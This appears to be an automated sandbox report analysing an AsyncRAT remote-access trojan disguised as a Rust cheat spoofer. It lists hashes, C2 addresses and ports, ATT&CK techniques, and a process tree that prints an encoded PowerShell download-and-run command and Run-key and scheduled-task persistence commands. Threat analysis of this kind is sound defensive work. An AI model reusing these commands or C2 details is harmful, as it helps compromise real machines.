asyncrat | 8744ee78fd8ec700b2d27545ad32e1e28f38f07c272d61bbcb8cff147cfb9bda

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
11/07/2022, 12:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hwid Spoofer Eac Rust Cleaner_nls.exe
Size

390KB
MD5

004dd8842386a105607735a890f57235
SHA1

9b1cb5e663cd342f1c44936c6db8540b6df0228b
SHA256

8744ee78fd8ec700b2d27545ad32e1e28f38f07c272d61bbcb8cff147cfb9bda
SHA512

95ac078482e9c3de3e0dc666322d2080a0a08443a0c5e2da848abcc45c5095e20dbd2e8cee6822eff13e4f98251e0e3b02c1ee4f70e0971d60eb56fa5f7de84c

Score

10^/10

asyncrat windows session manager persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Windows Session Manager

217.64.31.3:8808

217.64.31.3:8437

Mutex

Windows Session Manager

Attributes

delay
3
install
false
install_file
Windows Session Manager
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/4112-154-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2192	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
4440	111111111111111111111111_PROTECTED.EXE
3836	31.EXE
4348	SecurtyHealthService.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	Hwid Spoofer Eac Rust Cleaner_nls.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	31.EXE

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	SecurtyHealthService.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Session Manager = "C:\\Users\\Admin\\AppData\\Roaming\\Windows Session Manager\\Windows Session Manager.exe"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4440 set thread context of 4112	4440	111111111111111111111111_PROTECTED.EXE	94

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3024	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2192	powershell.exe
2192	powershell.exe
4440	111111111111111111111111_PROTECTED.EXE
4440	111111111111111111111111_PROTECTED.EXE
4844	powershell.exe
4844	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	4440	111111111111111111111111_PROTECTED.EXE
Token: SeDebugPrivilege	4844	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 1648 wrote to memory of 4440	1648	Hwid Spoofer Eac Rust Cleaner_nls.exe	83
PID 1648 wrote to memory of 4440	1648	Hwid Spoofer Eac Rust Cleaner_nls.exe	83
PID 1648 wrote to memory of 4440	1648	Hwid Spoofer Eac Rust Cleaner_nls.exe	83
PID 1648 wrote to memory of 3836	1648	Hwid Spoofer Eac Rust Cleaner_nls.exe	84
PID 1648 wrote to memory of 3836	1648	Hwid Spoofer Eac Rust Cleaner_nls.exe	84
PID 3836 wrote to memory of 2192	3836	31.EXE	85
PID 3836 wrote to memory of 2192	3836	31.EXE	85
PID 4440 wrote to memory of 4844	4440	111111111111111111111111_PROTECTED.EXE	87
PID 4440 wrote to memory of 4844	4440	111111111111111111111111_PROTECTED.EXE	87
PID 4440 wrote to memory of 4844	4440	111111111111111111111111_PROTECTED.EXE	87
PID 4440 wrote to memory of 2240	4440	111111111111111111111111_PROTECTED.EXE	89
PID 4440 wrote to memory of 2240	4440	111111111111111111111111_PROTECTED.EXE	89
PID 4440 wrote to memory of 2240	4440	111111111111111111111111_PROTECTED.EXE	89
PID 2240 wrote to memory of 3024	2240	cmd.exe	91
PID 2240 wrote to memory of 3024	2240	cmd.exe	91
PID 2240 wrote to memory of 3024	2240	cmd.exe	91
PID 4440 wrote to memory of 260	4440	111111111111111111111111_PROTECTED.EXE	92
PID 4440 wrote to memory of 260	4440	111111111111111111111111_PROTECTED.EXE	92
PID 4440 wrote to memory of 260	4440	111111111111111111111111_PROTECTED.EXE	92
PID 2192 wrote to memory of 4348	2192	powershell.exe	93
PID 2192 wrote to memory of 4348	2192	powershell.exe	93
PID 2192 wrote to memory of 4348	2192	powershell.exe	93
PID 4440 wrote to memory of 4112	4440	111111111111111111111111_PROTECTED.EXE	94
PID 4440 wrote to memory of 4112	4440	111111111111111111111111_PROTECTED.EXE	94
PID 4440 wrote to memory of 4112	4440	111111111111111111111111_PROTECTED.EXE	94
PID 4440 wrote to memory of 4112	4440	111111111111111111111111_PROTECTED.EXE	94
PID 4440 wrote to memory of 4112	4440	111111111111111111111111_PROTECTED.EXE	94
PID 4440 wrote to memory of 4112	4440	111111111111111111111111_PROTECTED.EXE	94
PID 4440 wrote to memory of 4112	4440	111111111111111111111111_PROTECTED.EXE	94
PID 4440 wrote to memory of 4112	4440	111111111111111111111111_PROTECTED.EXE	94

C:\Users\Admin\AppData\Local\Temp\Hwid Spoofer Eac Rust Cleaner_nls.exe
"C:\Users\Admin\AppData\Local\Temp\Hwid Spoofer Eac Rust Cleaner_nls.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1648
- C:\Users\Admin\AppData\Roaming\111111111111111111111111_PROTECTED.EXE
  "C:\Users\Admin\AppData\Roaming\111111111111111111111111_PROTECTED.EXE"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4440
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Session Manager';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Session Manager' -Value '"C:\Users\Admin\AppData\Roaming\Windows Session Manager\Windows Session Manager.exe"' -PropertyType 'String'
    3⤵
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4844
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /C schtasks /create /tn \Windows Session Manager /tr "C:\Users\Admin\AppData\Roaming\Windows Session Manager\Windows Session Manager.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2240
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn \Windows Session Manager /tr "C:\Users\Admin\AppData\Roaming\Windows Session Manager\Windows Session Manager.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:3024
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    #cmd
    3⤵
    PID:260
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    #cmd
    3⤵
    PID:4112
- C:\Users\Admin\AppData\Roaming\31.EXE
  "C:\Users\Admin\AppData\Roaming\31.EXE"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOQAzADAAMQAxADAANwA5ADYAMQAwADcANwA1ADUANQAzADAALwA5ADcANgAxADYAOQAwADYAMgA3ADAANQAwADAAOAA2ADQAMAAvADIAMwAyAC4AZQB4AGUAJwAsACAAPAAjAG0AaABoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgBwAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBuAHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwApACkAPAAjAHEAZQB6ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZQB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAGYAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHUAZAB4ACMAPgA="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2192
  - - C:\Users\Admin\AppData\Roaming\SecurtyHealthService.exe
      "C:\Users\Admin\AppData\Roaming\SecurtyHealthService.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:4348

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
602843a4f163d7e8707bfda0bb869e20

SHA1
d4cf0a363c38c627269c9996d61684fee9d04fbd

SHA256
a411aadf9fe1a715653c79f8b8fb8f7d408c862007d69ebd8d21ec612864af42

SHA512
0991ec0bd92d97af29db17b1b02baedcda28515b9db79b72c44f44044dcdc5311f6a50d33016d4d1d002e55d1d014de9af634afda7ab95cd08b12cce9a1cb73a

Download Submit
C:\Users\Admin\AppData\Roaming\111111111111111111111111_PROTECTED.EXE

Filesize
87KB

MD5
346ba1d0419af2730de45a7da7fd7ef0

SHA1
2d4c79137a4a14f5b992dd91f053a83cdd382847

SHA256
ca74ada70ee8a46e7ed67ee7f5422370b31dd6e43d40970f79128556670e9d2c

SHA512
93fd893e10cbff156e80a9bbb5767deacc6e34f6c0c4e6d05db8c193fa297c6b5c301c681c2e2c536fa11440a6a1e11af2913e389b15dd0261fee9b7c223278a

Download Submit
C:\Users\Admin\AppData\Roaming\111111111111111111111111_PROTECTED.EXE

Filesize
87KB

MD5
346ba1d0419af2730de45a7da7fd7ef0

SHA1
2d4c79137a4a14f5b992dd91f053a83cdd382847

SHA256
ca74ada70ee8a46e7ed67ee7f5422370b31dd6e43d40970f79128556670e9d2c

SHA512
93fd893e10cbff156e80a9bbb5767deacc6e34f6c0c4e6d05db8c193fa297c6b5c301c681c2e2c536fa11440a6a1e11af2913e389b15dd0261fee9b7c223278a

Download Submit
C:\Users\Admin\AppData\Roaming\31.EXE

Filesize
6KB

MD5
b25294704e5eee30e80257e134cffa6c

SHA1
01a891469fcd46aa36b8bf85cdfce3ed197d41d3

SHA256
1eb20f517c0c3630095eeb0553390e906ee423dad7b5082a7b29a0243972b180

SHA512
cdc9f6b6434421c250f37ec262dc792b935f82a2960a7dd961071533e579ef16cd9873dca030f5f35e9284150e084f5e7a11e81059385471b1ed47f4aea08143

Download Submit
C:\Users\Admin\AppData\Roaming\31.EXE

Filesize
6KB

MD5
b25294704e5eee30e80257e134cffa6c

SHA1
01a891469fcd46aa36b8bf85cdfce3ed197d41d3

SHA256
1eb20f517c0c3630095eeb0553390e906ee423dad7b5082a7b29a0243972b180

SHA512
cdc9f6b6434421c250f37ec262dc792b935f82a2960a7dd961071533e579ef16cd9873dca030f5f35e9284150e084f5e7a11e81059385471b1ed47f4aea08143

Download Submit
C:\Users\Admin\AppData\Roaming\SecurtyHealthService.exe

Filesize
4.2MB

MD5
2e8fde338b4195c8332e77ea64632a84

SHA1
1709e55228e76bcbe99adf44172f13a759b43425

SHA256
7fc2763bb77b71c737b4ea86568ba5e9fb3699f3ade7bb07069eae4734e7310b

SHA512
c9f5d98f0a12570a8dc7271beda408e2e401b4b51d3d7490691d461b2abc8fd97bf8cc8bb97d619864a78e1c9d6a9b0e045fcbb3a6eb16e2e70ba31113b192ec

Download Submit
C:\Users\Admin\AppData\Roaming\SecurtyHealthService.exe

Filesize
4.2MB

MD5
2e8fde338b4195c8332e77ea64632a84

SHA1
1709e55228e76bcbe99adf44172f13a759b43425

SHA256
7fc2763bb77b71c737b4ea86568ba5e9fb3699f3ade7bb07069eae4734e7310b

SHA512
c9f5d98f0a12570a8dc7271beda408e2e401b4b51d3d7490691d461b2abc8fd97bf8cc8bb97d619864a78e1c9d6a9b0e045fcbb3a6eb16e2e70ba31113b192ec

Download Submit
memory/2192-140-0x00007FF85B7F0000-0x00007FF85C2B1000-memory.dmp

Filesize
10.8MB

Download
memory/2192-152-0x00007FF85B7F0000-0x00007FF85C2B1000-memory.dmp

Filesize
10.8MB

Download
memory/2192-138-0x0000020D53E20000-0x0000020D53E42000-memory.dmp

Filesize
136KB

Download
memory/3836-139-0x00007FF85B7F0000-0x00007FF85C2B1000-memory.dmp

Filesize
10.8MB

Download
memory/3836-136-0x0000000000720000-0x0000000000728000-memory.dmp

Filesize
32KB

Download
memory/4112-154-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4348-159-0x0000000004E10000-0x0000000004EAC000-memory.dmp

Filesize
624KB

Download
memory/4348-151-0x0000000000160000-0x000000000058E000-memory.dmp

Filesize
4.2MB

Download
memory/4440-142-0x0000000005A70000-0x0000000006014000-memory.dmp

Filesize
5.6MB

Download
memory/4440-141-0x0000000000C10000-0x0000000000C2C000-memory.dmp

Filesize
112KB

Download
memory/4844-155-0x00000000051C0000-0x00000000057E8000-memory.dmp

Filesize
6.2MB

Download
memory/4844-164-0x00000000064F0000-0x000000000650E000-memory.dmp

Filesize
120KB

Download
memory/4844-157-0x00000000050B0000-0x0000000005116000-memory.dmp

Filesize
408KB

Download
memory/4844-158-0x0000000005120000-0x0000000005186000-memory.dmp

Filesize
408KB

Download
memory/4844-146-0x0000000002620000-0x0000000002656000-memory.dmp

Filesize
216KB

Download
memory/4844-161-0x0000000005F50000-0x0000000005F6E000-memory.dmp

Filesize
120KB

Download
memory/4844-162-0x0000000006510000-0x0000000006542000-memory.dmp

Filesize
200KB

Download
memory/4844-163-0x0000000070CF0000-0x0000000070D3C000-memory.dmp

Filesize
304KB

Download
memory/4844-156-0x0000000004E90000-0x0000000004EB2000-memory.dmp

Filesize
136KB

Download
memory/4844-165-0x0000000007940000-0x0000000007FBA000-memory.dmp

Filesize
6.5MB

Download
memory/4844-166-0x00000000072E0000-0x00000000072FA000-memory.dmp

Filesize
104KB

Download
memory/4844-167-0x0000000007350000-0x000000000735A000-memory.dmp

Filesize
40KB

Download
memory/4844-168-0x0000000007550000-0x00000000075E6000-memory.dmp

Filesize
600KB

Download
memory/4844-169-0x0000000007510000-0x000000000751E000-memory.dmp

Filesize
56KB

Download
memory/4844-170-0x0000000007610000-0x000000000762A000-memory.dmp

Filesize
104KB

Download
memory/4844-171-0x0000000007600000-0x0000000007608000-memory.dmp

Filesize
32KB

Download
memory/4844-172-0x0000000007640000-0x0000000007662000-memory.dmp

Filesize
136KB

Download